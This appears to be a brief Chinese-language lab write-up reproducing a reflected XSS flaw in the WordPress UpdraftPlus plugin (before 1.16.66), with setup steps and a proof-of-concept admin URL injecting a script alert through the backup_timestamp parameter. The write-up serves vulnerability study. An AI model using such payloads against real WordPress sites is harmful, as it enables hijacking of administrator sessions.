漏洞介绍
UpdraftPlus插件在输出然后返回管理页面之前不会清理和转义 backup_timestamp 和 job_id 参数,从而导致反射型XSS
漏洞范围
UpdraftPlus 插件< 1.16.66
漏洞靶场
使用UpdraftPlus 1.16.50版本
https://downloads.wordpress.org/plugin/updraftplus.1.16.50.zip
使用CVE-2024-4439的docker-compose.yml
1 | version: '3.8' |
把插件解压到plugins里面,该目录会挂载到容器内的插件目录
在http://127.0.0.1:8080/wp-admin/plugins.php内,把该插件启用一下
漏洞原理
漏洞复现
访问该url
1 | http://example.com/wp-admin/options-general.php?page=updraftplus&backup_timestamp=%3Cscript%3Ealert%28/XSS/%29%3B%3C%2Fscript%3E&action=updraft_restore |
